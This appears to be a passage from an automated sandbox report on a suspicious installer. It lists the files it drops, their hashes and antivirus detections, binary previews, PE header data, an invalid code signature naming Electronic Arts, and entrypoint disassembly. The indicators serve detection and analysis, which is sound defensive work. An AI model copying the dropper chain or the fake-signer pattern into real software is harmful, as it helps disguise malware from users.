SHA-256:	A809BBD069781928DE8E44E2FDF46FB512AD3FB0A3CB5C4E4DF7FECB913A25EF
SHA-512:	69D0CD81BA807CC2927BA16FB929CCA9535D0B61D47AAEB37A162C894E7D6282C6784C6AC05304EB1BD3A356B6AD7ACF2C3B2693731AA3BF80D0722159A302BE
Malicious:	false
Preview:	......j.XA.....#3.@........@.Pjn......E......P..E..=.3M...E.u..E......A.......9....E......-.......M..u..E..Q..P.E..\|z......o...j.j...D...P................D....M.P.E..j..M...?...}....G.....M..0.!....E.3M.P.E.P.az...E...u>.E.3M......Ph.5M..E.P..Q...E.3M.P.E.P.,z...E.........3.M..u.h....P.u..w....M..O.......G.jN...Yf9H.u3.E..P..D...P.E.PVW.j<......G....U...u..M..E.P.~F...U....G....f.x.A..........A....<..}......}.}...t.............U.jN_f9z..}.ul.E..x..t....M.Q..D...QPVW...............u...6W..............M..~.3...D....}.j...D.....P.u.VW.G.....t{.3.u..PW......xij..E..PVW..............M..E.P.E...W...j._.....H.f;.t2f..@ub.>G..>...j3^f9p..u............@..Pj....c....M...w.._^[.......G........@.Pjy.>....M...M.....u.jn....@.PW.E....@......@.Ph.....U......SV..3.3.].A.]..M.M.M.W.]..d....M.3.@.].E.E.E..A..].]..].]..]..@.j.Z.E.....f9P.u...@.Pjn......].j...H.E.E..E.P.E.PQ..............3...U..Q.A...........}...............3.O...f9X..].u.......3......t....t...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nv

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	113548
Entropy (8bit):	6.0574044799300815
Encrypted:	false
SSDEEP:	1536:15el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:15elDWy4ZNoGmROL7F1G7ho2kOb
MD5:	51090A5FDB473D91E42D1CB97B8A428A
SHA1:	1C32D813866BBEA8C0A6F8F8E973492182A5BF9F
SHA-256:	71BA7801CF5DCA48AA239BE40C1653C2606EE701F106EE33A230100C71A48279
SHA-512:	CDB1926CE9E283244CA45E149B1D4412ECC01B9F84D5DE44755DC0E3D6401620686445E0509FCE83B9B14D86B815438421A008BCB8332D7A62217F1DEFFAFE20
Malicious:	false
Preview:	....................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.........................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Stationery

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	125952
Entropy (8bit):	6.698489610142967
Encrypted:	false
SSDEEP:	3072:n5mjccBiqXvpgF4qv+32eOyKODOSpQSAU4Cn:naccB3gBmmLsiS+SAhCn
MD5:	8518806BB06BE6BAADEB488794AAABF3
SHA1:	409721EA3F7BA3F5D1B45932E2935BBA373FF6CD
SHA-256:	BA5DABB440B7DF1B86D38EEAD20CD5F8259EAD9314D20AE20C59EF6A753D1272
SHA-512:	4F6316AAE24E30F706B001B6CC70E875F75DC654602D9676CB129A4A6D51BD7225D347D567258C4728811143B9AEBC77EC15D8274C7CF2A6A6FD198BEB836289
Malicious:	false
Preview:	.F..F......F...J........y.....I...t.h .J...@.I...@#M....^.VW..3.j.W.F.P........~,.~0..~4_^.V..F.P..<.I..N,^.....V..>.t..6.;...&.Y.f...f..^....M....L.....3....V.........t.......I...........WV.t$..L$..\|$.......;.v.;......... ............s...%..L...............%8.M..s..D$.^_..3.....u...%..L..........%8.M....................................s.......v..........s...~.....v.f............te..........f.oN.v..f.o^...0f.oF f.on0.v0..0f.o.f.:...f...f.o.f.:...f..G.f.o.f.:...f..o ..0s..v.....f.oN..v..I.f.o^...0f.oF f.on0.v0..0f.o.f.:...f...f.o.f.:...f..G.f.o.f.:...f..o ..0s..v..Vf.oN..v...f.o^...0f.oF f.on0.v0..0f.o.f.:...f...f.o.f.:...f..G.f.o.f.:...f..o ..0s..v....r...o.....v.f............s.......v..........s...~.....v.f...........B.........t.....I............u... .............$...B..$...B....B...B...B.,.B..D$.^_......D$.^_......F..G..D$.^_.I......F..G..F..G..D$.^_..4..<... ..Q.....%..L..............t.....+.F..G.NO...u.. ........................$...B....B...B...B...B..D$.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tender

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	211
Entropy (8bit):	4.756701402516343
Encrypted:	false
SSDEEP:	3:EvvWUqt/vllpfrYZcFTS9gXeF+X32ZpfW6MZCt7HINqCXjPYLEzClS66:EXdqjvVg3F+X32+hZCt7HSbYwClS66
MD5:	3D20D31BD2487DB158FFA9F1FC543FF0
SHA1:	F0F843C1896834F120C84C1FF5B71C617371B43B
SHA-256:	6B8E888A92BFFBE33B925105FC090188029CDAD312FFCDA40402F2B68A375B6D
SHA-512:	6E766226AB274BFDF92A6E8DDA3A851BA0F0C4F05B33131CA247F41AAD4DA73AA32F01B70FB9DD643271B857FA24AB9AA7AAFA9AABD519A2F9C4530AEB8435DC
Malicious:	false
Preview:	rangers........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Void

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997298202801035
Encrypted:	true
SSDEEP:	1536:0eNyYqyLDslxyXHk0r9PSeQdWDGIx0y/fWMv:hbxu8U4P2XIxdGMv
MD5:	6099265AB6A24040691705B91F892E0C
SHA1:	AD3D2BD2E95AE5B994CD7D16CDBE5E6512D53F87
SHA-256:	0B94367FB2E11645E5F791FEE2408482F04A652D3E9B5970BE0FD007D91DBA43
SHA-512:	EDCBF32DC219FCFFC2527815143C0DF60909CEB308E2368CB31A00661C8FBEB7FD18ACACF9D3FE3191EE30D98E87728F7347C8CCC4925BC56DA8C0DC4DB9BBE9
Malicious:	false
Preview:	..?....,..f....s.[..u.?...:.S.+.p>f....U..N..3.!..$...........V.:'.M...6.D$........>...}Uthd....!t..xv...4$.7n.vA.\|'? j...lX....B.....o.E..-../.-^-.wc.....P...0\|..\.a.6....hH...n../.T.k.^xM..\|..J.\`..L....J..=....}.9....2...;.T?.T...q....nF............".9....... .d.ob..L.DAUz)..........Xz!63.N........w..M....b\.~.p..].[.H.....1..,A..D==..N3.qni.<s...].Y..<k..x.*...!.%.K,...6.^....BQ.........>^....`~..._..){.....).4..D......4..X.\........!-.z........;.......d9.;.z.>..SW..~.....0.I...W...5V.ij.?.H.\|Vk.M.n.c^^C$,H\|@._.&=..5.E/...&..i.......'....-(..T.Ff.......n.Q@QNBo.CQ'lRMI..o..\..v.-..."@u44.....Ds.{....A.N.,_s.f!.=.^Jy]...[.r..}w..xb.3t.....2;..B&n......F.k...r.F...A7P..%.=oA...t..@@TQ....T8.......9..!:^.!.>.....=.&..D.)aj.K..5O..k..F0u.G.u...f.........`.]..OMq~:...a.m=.X.F.Ar....3.p@....v.."g.A.c..U..#.V..CN..d......M.m-Kr\|k...%.z.s...A.......l+=v.....}KB.r....x(w-.o...d...-C2..k-.,...m.Z.....$l'.h.#.:J9........F/..P..Y..v....T...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Within

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	110592
Entropy (8bit):	5.796278285979408
Encrypted:	false
SSDEEP:	1536:3nHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPS:XLeAg0Fuz08XvBNbjaAtsPS
MD5:	4D67E6FE8C38019474FC08F788D02239
SHA1:	90F43365777A7D1F863E8A0372C502A05C810BFA
SHA-256:	8E9074768606B042CED17305E4C6A93159EB3046CE88C152A0DC3CCC9EDC4576
SHA-512:	65E5D5446B17905DE0ACA0605F397BA8F4484A73333B4AD6F4349564C4A021445F7676F13F03242EB5F7169F9239B67871DD1F854E121E107D563BB28FC2FE72
Malicious:	false
Preview:	........GetTimeFormatEx.........InitializeCriticalSectionEx.........LCMapStringEx...........LocaleNameToLCID........RoInitialize........RoUninitialize........ . . . . . . . . .(.(.(.(.(. . . . . . . . . . . . . . . . . . .H............................................................................................................................................................................................. . . . . . .(. . . . . . . . . . . . . . . . . . . . . . . . . . ...........................0........................................................................................................................................................................................................................................................................................................................................................................................................................................... . . . . . . . . .(.(.(.(.(. . . . . . . . . . . . . . . . . . .H...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\You

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.5.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997367724649039
Encrypted:	true
SSDEEP:	1536:kOZABzSwHZ1WU9P9aPGHHFQDntgp9EadgKZ99oTGMDIXiTk:kOZAhSwHZ1vl4Q9xChk
MD5:	C18C93117EC98524FE7B32EA4EB18FDB
SHA1:	4113048A3858CBAF7DFFACF2943A8C4E1A3D21E8
SHA-256:	6686AC28757911AA043D6BD1378C32F73921F70E831D95CBC28417CB60FF7A6E
SHA-512:	4DA54F979C12F1CB25B34D0CBD8C3384E9FAA1E4203BDD0DE60547221B7E477B11E6685134F63EC17E160559B6D5DCB0E4B19457ED93F7EBDD7A38B880C0DDAB
Malicious:	false
Preview:	...q.\|.FK?..N.9...y."Z.'1..l..m.Z.G.\yy.b...Hc..C.........T"..G..(..~E3,.h-..XK..@c...f.4.GB.K.o(dUd..5n...U......d..s]b..K....wP...(.<..-..7....Hg.fw..H 8.&'z3S..'1..7...hv.6..d....U....Rw.g....w.t]K....m>.d...ZI..1q.Fr........w&qW.9}.).~...Kh..{.....'#.....u.cU...P.....3..J.UEEa.^E.t....$..Z.,...EF..\|.......E....J.v.n'...g....... zE...0..n..UAv2.P4..q.....hG."v.Q.....\|....~.Uwt./..8G..A..}..@".@"...&..W.v....o.5.AJ....`..q.a"PBm:f...Z....P<.P]..n...3-W\...%/.`....%......;..$.4.[......,...t.?Qx...y5m..,.3)..a...&K..G.....n...N9.....'.........>.(.V..X0}.p..fF...i).aL.[s....k.$...X.wY3...21J.+.B.Ac.%zUH....9.$M..s.&(...mT...)}...`......T.{4..z..a...i4p.j....XO)....O..`...h...0.....H^]...X\|..:.7...CW..s<Z$.F...D.=.,...kG...*-...#Y...c.xkz.PiZ.....E..I.....6.L1%}v.[+....!o..$...d..jy..D.9s4..A....:{`a.p..N..'<m.?..8.Qdl.}..n.q...o.2..s...W0w....vH.N$..i..R#..o.>?..k.@q.... ....$..6.Y....../[y...,..V.a%5..Q..U.....{.N.M.V.HO.'.>&.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8767044
Entropy (8bit):	7.960152326344281
Encrypted:	false
SSDEEP:	196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
MD5:	51F99EDDD33CC04FB0F55F873B76D907
SHA1:	60CD79359912A9069674CEE3C5C5982A9B01CE82
SHA-256:	16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
SHA-512:	7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 14%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0fkrmsd.ivt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qao4bkwm.ttl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ColorStreamLib\is-N6HUM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9823164069853005
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	installer_1.05_36.5.exe
File size:	1'080'005 bytes
MD5:	8850838982a2e4f34598328ed33a3cda
SHA1:	1c36e904ea837c571ff55e19a58a1d30f25858d2
SHA256:	fb95fc66166b36ecf9f23bb34b29965e92827c16fe51ca69cc5389eb3898b2e3
SHA512:	fdaa2634ac288ac4659dd591442cf57608a145badac21707acdc077fbd408645de8c79342295da730c279d50049c0c2e005c69e44411ba3c5c95a05aac8355c1
SSDEEP:	24576:BBeubeAjXoVLH9ZToeUWXkhnY6Fd3+HjnZiTSu+:nLefVH9ZT+WX03GDZiTT+
TLSH:	B335235869A85C2FFCFA0E743CB445234CF5A941686A8417A71CC89C3097981DBBDFBE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n...<...B...8.....

File Icon


Icon Hash:	0031e4845a2a8804

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	04/05/2023 01:00:00 07/05/2026 00:59:59
Subject Chain	CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
Version:	3
Thumbprint MD5:	33BD4710688F5874BAC612E52BCCEEA8
Thumbprint SHA-1:	A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
Thumbprint SHA-256:	0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
Serial:	0671352DC4C103B70AE725E954486374

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FFAF4B9E75Bh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FFAF4B9E43Dh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FFAF4B9E42Bh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FFAF4B9BD2Ah
push 00000022h
